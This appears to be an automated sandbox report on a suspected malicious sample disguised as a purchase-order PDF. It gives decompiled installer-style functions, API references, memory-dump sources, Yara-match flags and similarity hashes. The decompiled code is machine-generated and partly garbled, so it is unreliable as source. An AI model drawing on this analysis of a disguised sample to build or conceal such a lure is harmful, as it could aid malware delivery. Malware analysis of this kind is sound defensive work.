                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 70be9028bfe8f31cc5e4db828731ddaff9b24b4b814339d392eb8a92420bd9c1
                                            • Instruction ID: 0ae05739294a5017281d9f0176e65085105542092b9dd47992e5a2b5b9d3324e
                                            • Opcode Fuzzy Hash: 70be9028bfe8f31cc5e4db828731ddaff9b24b4b814339d392eb8a92420bd9c1
                                            • Instruction Fuzzy Hash: 66B09231044318BFEE842B91DC49B883F28FB046A2F004020F64D48064CBB256588B96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 39%
                                            			E0040290B(short __ebx, short* __edi) {
                                            				void* _t21;
                                            
                                            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                            					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                            					_push(_t21 - 0x2b0);
                                            					_push(__edi);
                                            					E00406668();
                                            				} else {
                                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                            					 *__edi = __ebx;
                                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                                            				}
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                            				return 0;
                                            			}




                                            0x00402923
                                            0x0040293e
                                            0x00402949
                                            0x0040294a
                                            0x00402a94
                                            0x00402925
                                            0x00402928
                                            0x0040292b
                                            0x0040292e
                                            0x0040292e
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                            • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                            • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                            • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10001E8C() {
                                            				void* _t3;
                                            
                                            				_t3 = GetProcessHeap();
                                            				 *0x1000bf00 = _t3;
                                            				return 0 | _t3 != 0x00000000;
                                            			}




                                            0x10001e8c
                                            0x10001e99
                                            0x10001ea0

                                            APIs
                                            • GetProcessHeap.KERNEL32(10001365,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001,?), ref: 10001E8C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: d99d0f3babccd101b0e6f39778d23551cd0dfc21a296d886a3547414dd714436
                                            • Instruction ID: 215dc24fbe99a76f31b03c3578fa2aba8265b2717fe9d478c089e04f2bdfcf36
                                            • Opcode Fuzzy Hash: d99d0f3babccd101b0e6f39778d23551cd0dfc21a296d886a3547414dd714436
                                            • Instruction Fuzzy Hash: 70B012B03019174BE78C4F388C9431E35D47708141300803DF503C2D79EF2084109F04
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExitProcess.KERNEL32(00000000), ref: 02450DB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 52eb61103d680095326321134e4d4dc95cfaf0269680ba057166f659d5d11696
                                            • Instruction ID: 286ab9ddf51b1581ce795ad764154499c66c67f8d988739b5ab9667d772c4fdd
                                            • Opcode Fuzzy Hash: 52eb61103d680095326321134e4d4dc95cfaf0269680ba057166f659d5d11696
                                            • Instruction Fuzzy Hash: 44D10154C5D2EDADCF06CBE984647FCBFB05D2A102F4845CAE4E1A6243C13A938EDB25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                            • Instruction ID: 11127a6b4ca275939c21f5b137a756c110c20cbc1af59fe7303feaa7ad6d9307
                                            • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                            • Instruction Fuzzy Hash: 3211C23A600129AFC721DF69C8809AEB7E9EF187A47049016FC94CB311E335ED81CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                            • Instruction ID: 9ad9c74640eadf75f16be42916e1cc71681e646628c518384f2b1673048178af
                                            • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                            • Instruction Fuzzy Hash: 00E09A39264148EFCB00CBA8CD80E25B3F8EB0C320B040291FC25C73A1E634EE00DA90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                            • Instruction ID: 373de72d7c84de8a3a1bd85239e12dcd5fbeaf21b3a4ee4ea331c3712da14696
                                            • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                            • Instruction Fuzzy Hash: 00E04F3A2106249BC7629B5AC940E97F7E9EB8C7B0B495426EDC997612C731FC01CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                            				struct HWND__* _v8;
                                            				struct HWND__* _v12;
                                            				long _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				signed char* _v32;
                                            				int _v36;
                                            				signed int _v44;
                                            				int _v48;
                                            				signed int* _v60;
                                            				signed char* _v64;
                                            				signed int _v68;
                                            				long _v72;
                                            				void* _v76;
                                            				intOrPtr _v80;
                                            				intOrPtr _v84;
                                            				void* _v88;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t198;
                                            				intOrPtr _t201;
                                            				long _t207;
                                            				signed int _t211;
                                            				signed int _t222;
                                            				void* _t225;
                                            				void* _t226;
                                            				int _t232;
                                            				long _t237;
                                            				long _t238;
                                            				signed int _t239;
                                            				signed int _t245;
                                            				signed int _t247;
                                            				signed char _t248;
                                            				signed char _t254;
                                            				void* _t258;
                                            				void* _t260;
                                            				signed char* _t278;
                                            				signed char _t279;
                                            				long _t284;
                                            				struct HWND__* _t291;
                                            				signed int* _t292;
                                            				int _t293;
                                            				long _t294;
                                            				signed int _t295;
                                            				void* _t297;
                                            				long _t298;
                                            				int _t299;
                                            				signed int _t300;
                                            				signed int _t303;
                                            				signed int _t311;
                                            				signed char* _t319;
                                            				int _t324;
                                            				void* _t326;
                                            
                                            				_t291 = _a4;
                                            				_v12 = GetDlgItem(_t291, 0x3f9);
                                            				_v8 = GetDlgItem(_t291, 0x408);
                                            				_t326 = SendMessageW;
                                            				_v24 =  *0x42a288;
                                            				_v28 =  *0x42a270 + 0x94;
                                            				if(_a8 != 0x110) {
                                            					L23:
                                            					if(_a8 != 0x405) {
                                            						_t301 = _a16;
                                            					} else {
                                            						_a12 = 0;
                                            						_t301 = 1;
                                            						_a8 = 0x40f;
                                            						_a16 = 1;
                                            					}
                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                            						_v16 = _t301;
                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                            							if(( *0x42a279 & 0x00000002) != 0) {
                                            								L41:
                                            								if(_v16 != 0) {
                                            									_t237 = _v16;
                                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                            									}
                                            									_t238 = _v16;
                                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                            										_t301 = _v24;
                                            										_t239 =  *(_t238 + 0x5c);
                                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                            										} else {
                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                            										}
                                            									}
                                            								}
                                            								goto L48;
                                            							}
                                            							if(_a8 == 0x413) {
                                            								L33:
                                            								_t301 = 0 | _a8 != 0x00000413;
                                            								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                            								_t295 = _t245;
                                            								if(_t295 >= 0) {
                                            									_t94 = _v24 + 8; // 0x8
                                            									_t301 = _t245 * 0x818 + _t94;
                                            									_t247 =  *_t301;
                                            									if((_t247 & 0x00000010) == 0) {
                                            										if((_t247 & 0x00000040) == 0) {
                                            											_t248 = _t247 ^ 0x00000001;
                                            										} else {
                                            											_t254 = _t247 ^ 0x00000080;
                                            											if(_t254 >= 0) {
                                            												_t248 = _t254 & 0x000000fe;
                                            											} else {
                                            												_t248 = _t254 | 0x00000001;
                                            											}
                                            										}
                                            										 *_t301 = _t248;
                                            										E0040117D(_t295);
                                            										_a12 = _t295 + 1;
                                            										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                            										_a8 = 0x40f;
                                            									}
                                            								}
                                            								goto L41;
                                            							}
                                            							_t301 = _a16;
                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                            								goto L41;
                                            							}
                                            							goto L33;
                                            						} else {
                                            							goto L48;
                                            						}
                                            					} else {
                                            						L48:
                                            						if(_a8 != 0x111) {
                                            							L56:
                                            							if(_a8 == 0x200) {
                                            								SendMessageW(_v8, 0x200, 0, 0);
                                            							}
                                            							if(_a8 == 0x40b) {
                                            								_t225 =  *0x42372c;
                                            								if(_t225 != 0) {
                                            									ImageList_Destroy(_t225);
                                            								}
                                            								_t226 =  *0x423740;
                                            								if(_t226 != 0) {
                                            									GlobalFree(_t226);
                                            								}
                                            								 *0x42372c = 0;
                                            								 *0x423740 = 0;
                                            								 *0x42a2c0 = 0;
                                            							}
                                            							if(_a8 != 0x40f) {
                                            								L90:
                                            								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                                            									ShowWindow(_v8, _t324);
                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                            								}
                                            								goto L93;
                                            							} else {
                                            								E004011EF(_t301, 0, 0);
                                            								_t198 = _a12;
                                            								if(_t198 != 0) {
                                            									if(_t198 != 0xffffffff) {
                                            										_t198 = _t198 - 1;
                                            									}
                                            									_push(_t198);
                                            									_push(8);
                                            									E00404FFF();
                                            								}
                                            								if(_a16 == 0) {
                                            									L75:
                                            									E004011EF(_t301, 0, 0);
                                            									_v36 =  *0x423740;
                                            									_t201 =  *0x42a288;
                                            									_v64 = 0xf030;
                                            									_v24 = 0;
                                            									if( *0x42a28c <= 0) {
                                            										L86:
                                            										if( *0x42a31e == 0x400) {
                                            											InvalidateRect(_v8, 0, 1);
                                            										}
                                            										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                            											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                            										}
                                            										goto L90;
                                            									}
                                            									_t292 = _t201 + 8;
                                            									do {
                                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                            										if(_t207 != 0) {
                                            											_t303 =  *_t292;
                                            											_v72 = _t207;
                                            											_v76 = 8;
                                            											if((_t303 & 0x00000001) != 0) {
                                            												_v76 = 9;
                                            												_v60 =  &(_t292[4]);
                                            												_t292[0] = _t292[0] & 0x000000fe;
                                            											}
                                            											if((_t303 & 0x00000040) == 0) {
                                            												_t211 = (_t303 & 0x00000001) + 1;
                                            												if((_t303 & 0x00000010) != 0) {
                                            													_t211 = _t211 + 3;
                                            												}
                                            											} else {
                                            												_t211 = 3;
                                            											}
                                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                            										}
                                            										_v24 = _v24 + 1;
                                            										_t292 =  &(_t292[0x206]);
                                            									} while (_v24 <  *0x42a28c);
                                            									goto L86;
                                            								} else {
                                            									_t293 = E004012E2( *0x423740);
                                            									E00401299(_t293);
                                            									_t222 = 0;
                                            									_t301 = 0;
                                            									if(_t293 <= 0) {
                                            										L74:
                                            										SendMessageW(_v12, 0x14e, _t301, 0);
                                            										_a16 = _t293;
                                            										_a8 = 0x420;
                                            										goto L75;
                                            									} else {
                                            										goto L71;
                                            									}
                                            									do {
                                            										L71:
                                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                            											_t301 = _t301 + 1;
                                            										}
                                            										_t222 = _t222 + 1;
                                            									} while (_t222 < _t293);
                                            									goto L74;
                                            								}
                                            							}
                                            						}
                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                            							goto L93;
                                            						} else {
                                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                            							if(_t232 == 0xffffffff) {
                                            								goto L93;
                                            							}
                                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                            								_t294 = 0x20;
                                            							}
                                            							E00401299(_t294);
                                            							SendMessageW(_a4, 0x420, 0, _t294);
                                            							_a12 = _a12 | 0xffffffff;
                                            							_a16 = 0;
                                            							_a8 = 0x40f;
                                            							goto L56;
                                            						}
                                            					}
                                            				} else {
                                            					_v36 = 0;
                                            					_v20 = 2;
                                            					 *0x42a2c0 = _t291;
                                            					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                            					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                            					 *0x423734 =  *0x423734 | 0xffffffff;
                                            					_t297 = _t258;
                                            					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                            					 *0x42372c = _t260;
                                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                            					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                            					}
                                            					DeleteObject(_t297);
                                            					_t298 = 0;
                                            					do {
                                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                            							if(_t298 != 0x20) {
                                            								_v20 = 0;
                                            							}
                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                            						}
                                            						_t298 = _t298 + 1;
                                            					} while (_t298 < 0x21);
                                            					_t299 = _a16;
                                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                            					_push(0x15);
                                            					E004045C4(_a4);
                                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                            					_push(0x16);
                                            					E004045C4(_a4);
                                            					_t300 = 0;
                                            					_v16 = 0;
                                            					if( *0x42a28c <= 0) {
                                            						L19:
                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                            						goto L20;
                                            					} else {
                                            						_t319 = _v24 + 8;
                                            						_v32 = _t319;
                                            						do {
                                            							_t278 =  &(_t319[0x10]);
                                            							if( *_t278 != 0) {
                                            								_v64 = _t278;
                                            								_t279 =  *_t319;
                                            								_v88 = _v16;
                                            								_t311 = 0x20;
                                            								_v84 = 0xffff0002;
                                            								_v80 = 0xd;
                                            								_v68 = _t311;
                                            								_v44 = _t300;
                                            								_v72 = _t279 & _t311;
                                            								if((_t279 & 0x00000002) == 0) {
                                            									if((_t279 & 0x00000004) == 0) {
                                            										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                            									} else {
                                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                            									}
                                            								} else {
                                            									_v80 = 0x4d;
                                            									_v48 = 1;
                                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                            									_v36 = 1;
                                            									 *( *0x423740 + _t300 * 4) = _t284;
                                            									_v16 =  *( *0x423740 + _t300 * 4);
                                            								}
                                            							}
                                            							_t300 = _t300 + 1;
                                            							_t319 =  &(_v32[0x818]);
                                            							_v32 = _t319;
                                            						} while (_t300 <  *0x42a28c);
                                            						if(_v36 != 0) {
                                            							L20:
                                            							if(_v20 != 0) {
                                            								E004045F9(_v8);
                                            								goto L23;
                                            							} else {
                                            								ShowWindow(_v12, 5);
                                            								E004045F9(_v12);
                                            								L93:
                                            								return E0040462B(_a8, _a12, _a16);
                                            							}
                                            						}
                                            						goto L19;
                                            					}
                                            				}
                                            			}


























































                                            0x00405038
                                            0x00405051
                                            0x00405056
                                            0x0040505e
                                            0x00405064
                                            0x0040507a
                                            0x0040507d
                                            0x004052a8
                                            0x004052af
                                            0x004052c3
                                            0x004052b1
                                            0x004052b3
                                            0x004052b6
                                            0x004052b7
                                            0x004052be
                                            0x004052be
                                            0x004052cf
                                            0x004052dd
                                            0x004052e0
                                            0x004052f6
                                            0x0040536b
                                            0x0040536e
                                            0x00405370
                                            0x0040537a
                                            0x00405388
                                            0x00405388
                                            0x0040538a
                                            0x00405394
                                            0x0040539a
                                            0x0040539d
                                            0x004053a0
                                            0x004053bb
                                            0x004053a2
                                            0x004053ac
                                            0x004053ac
                                            0x004053a0
                                            0x00405394
                                            0x00000000
                                            0x0040536e
                                            0x004052fb
                                            0x00405306
                                            0x0040530b
                                            0x00405312
                                            0x00405317
                                            0x0040531b
                                            0x00405326
                                            0x00405326
                                            0x0040532a
                                            0x0040532e
                                            0x00405332
                                            0x00405345
                                            0x00405334
                                            0x00405334
                                            0x0040533b
                                            0x00405341
                                            0x0040533d
                                            0x0040533d
                                            0x0040533d
                                            0x0040533b
                                            0x00405349
                                            0x0040534b
                                            0x0040535e
                                            0x00405361
                                            0x00405364
                                            0x00405364
                                            0x0040532e
                                            0x00000000
                                            0x0040531b
                                            0x004052fd
                                            0x00405304
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004053be
                                            0x004053be
                                            0x004053c5
                                            0x00405436
                                            0x0040543e
                                            0x00405446
                                            0x00405446
                                            0x0040544f
                                            0x00405451
                                            0x00405458
                                            0x0040545b
                                            0x0040545b
                                            0x00405461
                                            0x00405468
                                            0x0040546b
                                            0x0040546b
                                            0x00405471
                                            0x00405477
                                            0x0040547d
                                            0x0040547d
                                            0x0040548a
                                            0x004055eb
                                            0x004055f2
                                            0x0040560f
                                            0x00405615
                                            0x00405627
                                            0x00405627
                                            0x00000000
                                            0x00405490
                                            0x00405492
                                            0x00405497
                                            0x0040549c
                                            0x004054a1
                                            0x004054a3
                                            0x004054a3
                                            0x004054a4
                                            0x004054a5
                                            0x004054a7
                                            0x004054a7
                                            0x004054af
                                            0x004054f0
                                            0x004054f2
                                            0x00405502
                                            0x00405505
                                            0x0040550a
                                            0x00405511
                                            0x00405514
                                            0x004055b6
                                            0x004055bf
                                            0x004055c7
                                            0x004055c7
                                            0x004055d5
                                            0x004055e6
                                            0x004055e6
                                            0x00000000
                                            0x004055d5
                                            0x0040551a
                                            0x0040551d
                                            0x00405523
                                            0x00405528
                                            0x0040552a
                                            0x0040552c
                                            0x00405532
                                            0x00405539
                                            0x0040553e
                                            0x00405545
                                            0x00405548
                                            0x00405548
                                            0x0040554f
                                            0x0040555b
                                            0x0040555f
                                            0x00405561
                                            0x00405561
                                            0x00405551
                                            0x00405553
                                            0x00405553
                                            0x00405581
                                            0x0040558d
                                            0x0040559c
                                            0x0040559c
                                            0x0040559e
                                            0x004055a1
                                            0x004055aa
                                            0x00000000
                                            0x004054b1
                                            0x004054bc
                                            0x004054bf
                                            0x004054c4
                                            0x004054c6
                                            0x004054ca
                                            0x004054da
                                            0x004054e4
                                            0x004054e6
                                            0x004054e9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004054cc
                                            0x004054cc
                                            0x004054d2
                                            0x004054d4
                                            0x004054d4
                                            0x004054d5
                                            0x004054d6
                                            0x00000000
                                            0x004054cc
                                            0x004054af
                                            0x0040548a
                                            0x004053cd
                                            0x00000000
                                            0x004053e3
                                            0x004053ed
                                            0x004053f2
                                            0x00000000
                                            0x00000000
                                            0x00405404
                                            0x00405409
                                            0x00405415
                                            0x00405415
                                            0x00405417
                                            0x00405426
                                            0x00405428
                                            0x0040542c
                                            0x0040542f
                                            0x00000000
                                            0x0040542f
                                            0x004053cd
                                            0x00405083
                                            0x00405088
                                            0x00405091
                                            0x00405098
                                            0x004050aa
                                            0x004050b5
                                            0x004050bb
                                            0x004050c9
                                            0x004050dd
                                            0x004050e2
                                            0x004050ef
                                            0x004050f4
                                            0x0040510a
                                            0x0040511b
                                            0x00405128
                                            0x00405128
                                            0x0040512b
                                            0x00405131
                                            0x00405133
                                            0x00405136
                                            0x0040513b
                                            0x00405140
                                            0x00405142
                                            0x00405142
                                            0x00405162
                                            0x00405162
                                            0x00405164
                                            0x00405165
                                            0x0040516a
                                            0x00405170
                                            0x00405174
                                            0x00405179
                                            0x00405181
                                            0x00405185
                                            0x0040518a
                                            0x0040518f
                                            0x00405197
                                            0x0040519a
                                            0x0040526a
                                            0x0040527d
                                            0x00000000
                                            0x004051a0
                                            0x004051a3
                                            0x004051a6
                                            0x004051a9
                                            0x004051a9
                                            0x004051af
                                            0x004051b8
                                            0x004051bb
                                            0x004051bf
                                            0x004051c2
                                            0x004051c5
                                            0x004051ce
                                            0x004051d7
                                            0x004051da
                                            0x004051dd
                                            0x004051e0
                                            0x0040521e
                                            0x00405249
                                            0x00405220
                                            0x0040522f
                                            0x0040522f
                                            0x004051e2
                                            0x004051e5
                                            0x004051f3
                                            0x004051fd
                                            0x00405205
                                            0x0040520c
                                            0x00405217
                                            0x00405217
                                            0x004051e0
                                            0x0040524f
                                            0x00405250
                                            0x0040525c
                                            0x0040525c
                                            0x00405268
                                            0x00405283
                                            0x00405286
                                            0x004052a3
                                            0x00000000
                                            0x00405288
                                            0x0040528d
                                            0x00405296
                                            0x00405629
                                            0x0040563b
                                            0x0040563b
                                            0x00405286
                                            0x00000000
                                            0x00405268
                                            0x0040519a

                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                            • GetDlgItem.USER32(?,00000408), ref: 00405054
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                            • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                            • DeleteObject.GDI32(00000000), ref: 0040512B
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                            • GlobalFree.KERNEL32(?), ref: 0040546B
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                            • ShowWindow.USER32(00000000), ref: 00405627
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
